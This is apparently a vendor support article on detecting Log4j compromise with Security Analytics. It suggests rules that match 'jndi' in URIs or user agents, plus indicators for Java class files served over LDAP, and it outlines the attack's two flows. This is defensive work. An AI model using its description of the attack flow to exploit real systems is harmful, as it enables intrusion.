With the details around the Log4j vulnerability published in late 2021, analysts are interested in using Security Analytics to detect when they have been compromised by the Log4j vulnerability. Fortunately Security Analytics itself is not vulnerable (see Log4j2 vulnerability in Security Analytics? for details).
Although there are multiple ways to use Security Analytics to detect possible infiltration using the Log4j vulnerability, these are just a few suggestions of what you could do. This is by no means a comprehensive solution.
The Log4j exploits typically has the string "jndi" in the http headers. You could add a rule with http_uri~jndi or user_agent~jndi. The attack uses two flows. The first flow is where user_agent~jndi would be present. The other flow of the attack is where the class files are downloaded. It is much easier to detect the first flow, as the second flow seems to be related to LDAP.
If you want to find .class files that were served from ldap, create two indicators:
Indicator 1: log4j_ua_ext (or whatever name you prefer)
Indicator 2: log4j_ua_mime (or whatever name you prefer)
Create a log4j_rule and add the two indicators above and specify the Type as Alert.